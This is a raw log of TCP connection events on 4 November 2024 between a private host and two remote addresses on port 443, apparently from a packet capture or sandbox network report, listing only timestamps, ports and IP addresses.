Nov 4, 2024 17:31:21.852938890 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.855535030 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.856059074 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.856082916 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.856461048 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.856467009 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.859879971 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.860001087 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.860408068 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.860415936 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.860666037 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.860681057 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.861047983 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.861052036 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.861135960 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.861145020 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.861967087 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.862376928 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.862390995 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.862744093 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.862750053 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.982901096 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.982963085 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.983083963 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.983392000 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.983409882 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.983424902 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.983431101 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.983464003 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.983529091 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.983582973 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.983704090 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.983704090 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.983721972 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.983736038 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.986970901 CET	49732	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.987019062 CET	443	49732	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.987118006 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.987121105 CET	49732	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.987154007 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.987377882 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.987481117 CET	49732	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.987488031 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.987498999 CET	443	49732	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.987504005 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.987718105 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.988055944 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.988248110 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.988290071 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.988301992 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.988370895 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.988378048 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.991333008 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.991359949 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.991483927 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.991626024 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.991688967 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.991703033 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.992316961 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.992391109 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.992427111 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.992433071 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.992444038 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.992453098 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.995290041 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.995327950 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.995462894 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.995599031 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.995614052 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.997499943 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.997592926 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.997687101 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.997911930 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.997911930 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.997931004 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.997941971 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.000958920 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.000988007 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.001128912 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.001274109 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.001286983 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.734464884 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.736498117 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.737045050 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.737049103 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.737071991 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.737081051 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.737571001 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.737576008 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.737858057 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.737863064 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.741810083 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.742368937 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.742384911 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.742815971 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.742821932 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.865847111 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.865931034 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.866019011 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.866763115 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.867034912 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.867064953 CET	49734	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.867089033 CET	443	49734	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.867095947 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.867130041 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.867149115 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.867223024 CET	49735	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.867229939 CET	443	49735	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.871891022 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.871943951 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.872071028 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.872946978 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.873011112 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.873091936 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.873212099 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.873243093 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.873380899 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.873600960 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.873615026 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.874923944 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.874933004 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.874947071 CET	49736	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.874950886 CET	443	49736	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.875721931 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.875735998 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.877439976 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.877480030 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:22.877566099 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.877990961 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:22.878006935 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.624854088 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.624922037 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.625431061 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.625435114 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.625452042 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.625458002 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.625940084 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.625946999 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.625994921 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.626000881 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.652349949 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.653054953 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.653078079 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.653588057 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.653594017 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.756871939 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.757261992 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.757318020 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.757385969 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.757394075 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.757427931 CET	49738	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.757432938 CET	443	49738	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.760857105 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.760904074 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.760977030 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.761147976 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.761162043 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.761837959 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.762584925 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.762636900 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.762670994 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.762689114 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.762705088 CET	49739	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.762711048 CET	443	49739	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.764959097 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.764970064 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.765033007 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.765161991 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.765170097 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.790298939 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.790517092 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.790570021 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.790611029 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.790621996 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.790637970 CET	49737	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.790642977 CET	443	49737	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.793232918 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.793251991 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:23.793318987 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.793450117 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:23.793462992 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.452280998 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:24.452322006 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:24.452403069 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:24.452950954 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:24.452969074 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:24.492733955 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.493269920 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.493299961 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.493720055 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.493726015 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.504646063 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.505143881 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.505165100 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.508621931 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.508630037 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.522376060 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.523451090 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.523471117 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.523869038 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.523874998 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.643099070 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.643172026 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.643222094 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.651165962 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.651185989 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.651200056 CET	49741	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.651206970 CET	443	49741	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.653683901 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.653779030 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.653834105 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.658077002 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.658092976 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.658123970 CET	49742	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.658130884 CET	443	49742	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.671520948 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.671561003 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.671633005 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.672415972 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.672439098 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.673288107 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.673321009 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.673372984 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.673475981 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.673490047 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.832906961 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.833112001 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.833168983 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.833225012 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.833236933 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.833250046 CET	49740	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.833260059 CET	443	49740	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.836441994 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.836482048 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:24.836553097 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.836736917 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:24.836750031 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.404979944 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.405641079 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.405673027 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.406120062 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.406130075 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.419481993 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.420002937 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.420022011 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.420418024 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.420423985 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.542903900 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.543688059 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.543787956 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.543895006 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.543908119 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.543924093 CET	49744	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.543930054 CET	443	49744	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.546838045 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.546880007 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.546952009 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.547084093 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.547100067 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.555558920 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.555650949 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.555720091 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.555802107 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.555816889 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.555829048 CET	49745	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.555834055 CET	443	49745	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.558279991 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.558311939 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.558382034 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.558520079 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.558535099 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.600852966 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.601386070 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.601409912 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.601882935 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.601891041 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.738099098 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.738162041 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.738220930 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.738420963 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.738435984 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.738452911 CET	49746	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.738457918 CET	443	49746	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.741328001 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.741352081 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.741427898 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.741585016 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:25.741596937 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:25.942583084 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:25.942692995 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:25.944892883 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:25.944902897 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:25.945161104 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:25.946695089 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:25.946755886 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:25.946762085 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:25.946892023 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:25.987333059 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:26.194973946 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:26.195501089 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:26.195519924 CET	443	49743	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:26.195538044 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:26.195585966 CET	49743	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:26.304482937 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.304955006 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.304975033 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.305398941 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.305404902 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.344432116 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.345010996 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.345027924 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.345488071 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.345494032 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.440282106 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.440355062 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.440406084 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.440540075 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.440565109 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.440576077 CET	49747	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.440582991 CET	443	49747	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.443887949 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.443923950 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.443983078 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.444225073 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.444237947 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.479525089 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.482439041 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.482530117 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.482567072 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.482584953 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.482595921 CET	49748	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.482600927 CET	443	49748	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.485455036 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.485512018 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.485611916 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.485758066 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.485776901 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.493431091 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.493778944 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.493803024 CET	443	49749	13.107.246.45	192.168.2.5
